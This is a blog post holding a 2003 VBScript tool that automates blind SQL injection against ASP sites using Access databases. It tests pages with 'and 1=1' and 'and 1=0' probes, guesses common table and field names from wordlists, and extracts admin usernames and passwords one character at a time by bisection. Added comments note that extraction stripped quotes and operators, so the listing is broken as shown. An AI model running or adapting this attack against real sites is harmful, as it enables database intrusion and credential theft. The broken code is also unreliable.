这个脚本写于2003年,终于能收到我自己的博客里了。如今这样的注入漏洞已经很少了,一是纯asp的站越来越少,二是成熟的站点多见,一些漏洞都被补得差不多了,此脚本可以封存起来了。。。^_^
' sql注入之脚本篇-for access数据库 by 晴阳(liuxy)
'==========================================================================
'通过脚本对因过滤字符不严的asp页面进行自动攻击,能自动猜测常用表名,字段名和用户,密码
'经修改也能猜测其他不常见的表名,字段名和用户,密码,不过速度不会很快
'1->.攻击前检测是否存在漏洞。若url=http://ip/list.asp?id=1则可构造这样的url来检测
'http://ip/list.asp?id=1 http://ip/list.asp?id=1 and 1=1 http://ip/list.asp?id=1 and 1=0
'若两种情况与返回的正文不一致,则表明一定存在sql注入漏洞~~~恭喜恭喜!
'2->.检测表名 通过提交http://ip/list.asp?id=1 and exists (select * from ptable)来检测是否存在表ptable
'3->.检测字段名 通过提交http://ip/list.asp?id=1 and 0(select count(pfield) from ptable)
'4->.检测用户和密码 http://ip/list.asp?id=1 and exists (select * from tablename where user'1') 这里的user为常用字段
'http://ip/list.asp?id=1 and exists (select * from tablename where user=puser and len(pwd)>?)
'http://ip/list.asp?id=1 and exists (select * from tablename where user=username and asc(mid(pwd,i))>?)
' Script-wide globals shared by every function below. Several assignments on
' this page (errortable=..., tablefind(0)=, table(0)=...) have lost their string
' delimiters in extraction, so the listing does not run as shown; the code is
' kept byte-for-byte here and only comments are added.
dim url,bodytext,ptable,pfield,passtable,passuser,passpass,puser,puserlen,ppwd,ppwdlen,pcheck,pnum
dim checklen1,checklen2
dim lennumok
dim errortable
' Used by runinjection as a deliberately bogus table name: if pchecktable()
' reports even this as existing, the response comparison is not
' discriminating and runinjection prints this text and stops.
errortable=注入不成功!
' tablefind receives table names confirmed by runinjection (via addlength);
' its last element is kept as an empty sentinel. fieldfind is declared the
' same way but is not referenced anywhere else on this page.
dim tablefind()
redim preserve tablefind(0)
tablefind(0)=
dim fieldfind()
redim preserve fieldfind(0)
fieldfind(0)=
' Fixed wordlists of table and field names probed by runinjection. Defensive
' note: these names, together with the " and 1=1" / " and 1=0" / " and exists
' (select ..." fragments the helpers append to the url, are what this kind of
' probing looks like in a web server's request log; the server-side fix is
' parameterised queries rather than the character filtering the header
' comment describes as incomplete.
dim table(3)
table(0)=admin
table(1)=user
table(2)=login
table(3)=news
dim field(11)
field(0)=name
field(1)=user
field(2)=username
field(3)=pwd
field(4)=pass
field(5)=passwd
field(6)=password
field(7)=id
field(8)=title
field(9)=body
field(10)=topic
field(11)=board
function urlencoding(vstrin) ' url-encoding helper
' Walks vstrin one character at a time. Characters passing the test on the
' `if` line are copied through unchanged; every other character is split
' into two parts with the &hff00 / &hff masks and each part is emitted as a
' "%" followed by its hex() value. The comparison operator and `then` in the
' two `if` lines below were lost in extraction, so the exact threshold and
' adjustment condition are not visible on this page.
strreturn =
for i = 1 to len(vstrin)
thischr = mid(vstrin,i,1)
if abs(asc(thischr)) strreturn = strreturn & thischr
else
innercode = asc(thischr)
' presumably turns a negative asc() result into a positive code — the condition is lost; confirm against the original
if innercode innercode = innercode + &h10000
end if
' `\` is integer division; note the divisor is &hff as written, not &h100
hight8 = (innercode and &hff00)\ &hff
low8 = innercode and &hff
strreturn = strreturn & % & hex(hight8) & % & hex(low8)
end if
next
urlencoding = strreturn
end function
function bytes2bstr(vin) ' works around Chinese characters not displaying correctly
' Converts a byte array (the raw responsebody from the xmlhttp calls below)
' into a string. A byte that passes the test on the `if` line becomes one
' character; otherwise the byte and the following one are combined as
' high*&h100 + low into a single chr() and the loop index is advanced past
' the second byte. The comparison and `then` on the `if` line were lost in
' extraction, so the single/double-byte threshold is not visible here.
strreturn =
for i = 1 to lenb(vin)
thischarcode = ascb(midb(vin,i,1))
if thischarcode strreturn = strreturn & chr(thischarcode)
else
nextcharcode = ascb(midb(vin,i+1,1))
strreturn = strreturn & chr(clng(thischarcode) * &h100 + cint(nextcharcode))
' consume the second byte of the pair; no bounds check if it was the last byte
i = i + 1
end if
next
bytes2bstr = strreturn
end function
' grow an array by one
' Appends `find` to the dynamic array `idfind` (passed by reference): the
' current last element, kept as an empty sentinel, is overwritten with the
' value and a new empty sentinel is added after it. Returns nothing; the
' caller sees the change through the reference.
function addlength(idfind,find)
lennum=ubound(idfind)
redim preserve idfind(lennum+1)
idfind(lennum)=find
idfind(lennum+1)=
end function
' prompt for the url to test
' Top-level flow: ask for a url, percent-encode it, run pchecksql() and either
' quit or hand over to runinjection(). Note that urlencoding() is applied to
' the whole url *before* any probe fragment is appended, so only the base url
' is encoded. The string delimiters of the inputbox/echo arguments were lost
' in extraction.
wscript.echo chr(10)&========access数据库注入脚本(晴阳/liuxy)========
url=inputbox(请输入可能存在漏洞的网址:&chr(10)&chr(10)&形如http://localhost/sql/index.asp?id=1,,http://www.dttt.com/showdown.asp?id=83)
'bodytext=inputbox(请输入正常返回的地址:&chr(10)&chr(10)&这里输入正常返回时的正文&chr(10)&chr(10)&(取与错误页面中没有的部分),,sn: z9j8-pum4n-c6gzq key: rw2-7jw)
wscript.echo chr(10)&正在检查&url&注入漏洞...
url=urlencoding(url)
' pchecksql also sets the global bodytext that ppost() compares against
pchecksqlres=pchecksql(url)
if pchecksqlres=false then
wscript.echo chr(10)&========&url&无注入漏洞.退出!========
wscript.quit
else
wscript.echo chr(10)&========存在漏洞,开始注入!========
call runinjection()
end if
' injection section
' Drives the whole probe sequence and prints a tree-style report to the
' console. Reads the globals url, errortable, table(), field(), tablefind and
' pcheck; appends to puser/ppwd; has no return value. Steps: (1) a sanity probe
' with the bogus errortable name, (2) every name in table() via pchecktable,
' and for each hit every name in field() via pcheckfield, (3) if "admin" was
' among the hits, prompt for table/user/password field names and call
' pchecklen1 repeatedly — first for the length, then once per character
' position — appending chr(pcheck) each time.
function runinjection()
dim checkok
' probe each table name in table() in turn
wscript.echo chr(10)& ┌───开始猜测表名&chr(10)& │
' if even the bogus name "exists", the response comparison is not discriminating; stop here
if pchecktable(url,errortable)=true then
wscript.echo ├───&errortable&chr(10)& │
wscript.echo └───表名猜测完毕!&chr(10)
wscript.echo chr(10)&========access数据库注入脚本(晴阳/liuxy)========
exit function
end if
for i=0 to ubound(table) step 1
if pchecktable(url,table(i))=true then
checkok=true
call addlength(tablefind,table(i))
wscript.echo ├───找到表&table(i)&chr(10)& │
else checkok=false
end if
if checkok=true then
wscript.echo │ ├───表&table(i)&字段名&chr(10)& │
for j=0 to ubound(field) step 1
if pcheckfield(url,table(i),field(j))=true then
wscript.echo │ ├───&field(j)
end if
next
end if
next
wscript.echo └───表名猜测完毕!&chr(10)
' the user/password phase only runs when "admin" was confirmed (literal lost its quotes in extraction)
for i=0 to ubound(tablefind) step 1
if tablefind(i)=admin then
ptablefind=true
exit for
end if
next
if ptablefind=true then
wscript.echo ========开始查找表中用户密码========
' prompt for the table and field names whose length/content will be probed
plentable=inputbox(输入用户字段名:,脚本参数-表名,admin)
plenuser=inputbox(输入用户字段名:,脚本参数-用户字段名,user)
plenpass=inputbox(输入密码字段名:,脚本参数-密码字段名,pwd)
' style 1 = length search over 0..30; result arrives in the global pcheck
call pchecklen1(url,plentable,plenuser,1,1,0,30)
wscript.echo 表&plentable&字段&plenuser&中存在一个内容长为:&pcheck
' style 2 = one character code per position, searched over 32..127
for i=1 to pcheck step 1
call pchecklen1(url,plentable,plenuser,2,cstr(i),32,127)
puser=puser+chr(pcheck)
wscript.echo 查找用户&puser&......
next
wscript.echo 表&plentable&字段&plenuser&中存在一个内容:&puser
wscript.echo ========开始查找用户&puser&的密码:========
call pchecklen1(url,plentable,plenpass,1,1,0,32)
wscript.echo 表&plentable&字段&plenpass&中存在一个内容长为:&pcheck
for i=1 to pcheck step 1
call pchecklen1(url,plentable,plenpass,2,cstr(i),32,127)
ppwd=ppwd+chr(pcheck)
wscript.echo 用户&puser&的密码&ppwd&......
next
wscript.echo 表&plentable&字段&plenpass&中存在一个内容:&ppwd
end if
wscript.echo chr(10)&========access数据库注入脚本(晴阳/liuxy)========
end function
' core section: the code that runs the probes and builds the probe urls
'============================================================
' Sends purl with microsoft.xmlhttp (method and progid literals lost their
' quotes in extraction) and returns true when the decoded response contains
' the global bodytext set by pchecksql(), false otherwise. `on error resume
' next` means a failed request is never reported: execution just falls
' through to the instr() comparison with whatever pret holds.
function ppost(purl)
on error resume next
set pres = createobject(microsoft.xmlhttp)
pres.open post,purl,false
pres.send
' fetch the response; if the body contains bodytext the guess counts as a hit
pret=bytes2bstr(pres.responsebody)
if instr(pret, bodytext) > 0 then
ppost=true
else
ppost=false
end if
set pres = nothing
end function
'============================================================
' Same request as ppost() but returns the decoded response body itself
' instead of a hit/miss. With `on error resume next`, a failed request
' yields whatever bytes2bstr() makes of an unset responsebody.
function prettext(purl)
on error resume next
set pres=createobject(microsoft.xmlhttp)
pres.open post,purl,false
pres.send
prettext=bytes2bstr(pres.responsebody)
set pres=nothing
end function
' checks whether the page is injectable
' Fetches purl three times — unchanged, with " and 1=1" appended and with
' " and 1=0" appended (the fragment literals lost their quotes in extraction)
' — and compares the responses character by character. bodytext1 collects
' the common prefix of the plain and "1=1" responses; the second loop is
' meant to do the same for the "1=0" response into bodytext2. If the two
' prefixes differ (comparison operator lost on the `if` line) the page is
' reported injectable and the global bodytext is set to bodytext1, which
' ppost() then uses as its "true" marker. Returns true/false.
function pchecksql(purl)
dim continuefind,bodytext1,bodytext2
bodytext1=
bodytext2=
dim pchecksql1,pchecksql2,pchecksql3
pchecksql1=prettext(purl)
pchecksql2=prettext(purl+ and 1=1)
pchecksql3=prettext(purl+ and 1=0)
for i=1 to len(pchecksql1) step 1
if mid(pchecksql1,i,1)=mid(pchecksql2,i,1) then
bodytext1=bodytext1+mid(pchecksql1,i,1)
else
exit for
end if
next
for j=1 to len(pchecksql3) step 1
if mid(pchecksql3,i,1)=mid(pchecksql2,i,1) then
bodytext2=bodytext2+mid(pchecksql3,i,1)
else
exit for
end if
next
if bodytext1bodytext2 then
pchecksql=true
bodytext=bodytext1
'msgbox 存在注入漏洞!
else
pchecksql=false
'msgbox 无漏洞,退出!
end if
end function
'=============================================================
' probes common table names
' Appends an " and exists (select * from ptable)" fragment to purl (literal
' quotes lost in extraction) and returns true when ppost() reports a hit.
' The function never assigns false explicitly, so on a miss it returns the
' default Empty value; callers compare the result against true only.
function pchecktable(purl,ptable)
checktable=ppost(purl+ and exists (select * from +ptable+))
if checktable=true then
pchecktable=true
end if
end function
' probes common field names
' Appends a fragment comparing 0 with "(select count(pfield) from ptable)"
' to purl (the comparison operator between 0 and the subquery, and the
' string quotes, were lost in extraction) and returns true on a ppost() hit.
' Like pchecktable, false is never assigned; a miss returns Empty.
function pcheckfield(purl,ptable,pfield)
checkfield=ppost(purl+ and 0(select count(+pfield+) from +ptable+))
if checkfield=true then
pcheckfield=true
end if
end function
function pchecklen1(purl,ptable,pfield,pcheckstyle,pnum,m,n) ' probes the length and content of pfield
' Recursive bisection over the integer window [m,n]. pcheckstyle=1 builds a
' "len(pfield)" expression, pcheckstyle=2 an "asc(mid(pfield,pnum,1))"
' expression (all quotes lost in extraction). The expression is compared
' against the window bounds inside "exists (select top 1 * from ptable where
' ...)" probes sent through ppost(): first an out-of-window check that only
' prints a message (its operator is lost; note it echoes `pfield1`, not the
' `pfield` parameter), then equality with m and with n — either of which
' stores the answer in the global pcheck and exits — and otherwise a split at
' the midpoint mn with a recursive call on the matching half. The `if` on the
' midpoint line was merged with a commented-out debug echo in extraction, so
' the exact condition and the first recursive branch are not readable here.
' The result is delivered only through the global pcheck; there is no return
' value.
if pcheckstyle=1 then pcheckstr=len(+pfield+)
if pcheckstyle=2 then pcheckstr=asc(mid(+pfield+,+pnum+,1))
if ppost(purl+ and exists (select top 1 * from +ptable+ where +pcheckstr++n+))=true then
wscript.echo pfield1&中没有找到内容!
end if
if ppost(purl+ and exists (select top 1 * from +ptable+ where +pcheckstr+=+m+))=true then pcheck=cint(m):exit function
if ppost(purl+ and exists (select top 1 * from +ptable+ where +pcheckstr+=+n+))=true then pcheck=cint(n):exit function
' midpoint kept as a string; (n+m)/2 is not rounded, so mn may carry a ".5"
mn=cstr((cint(n)+cint(m))/2)
if ppost(purl+ and exists (select top 1 * from +ptable+ where +pcheckstr+>+m+ and +pcheckstr+ 'wscript.echo purl+ and exists (select top 1 * from +ptable+ where +pcheckstr+>+m+ and +pcheckstr+ call pchecklen1(purl,ptable,pfield,pcheckstyle,pnum,m,mn)
else
call pchecklen1(purl,ptable,pfield,pcheckstyle,pnum,mn,n)
end if
end function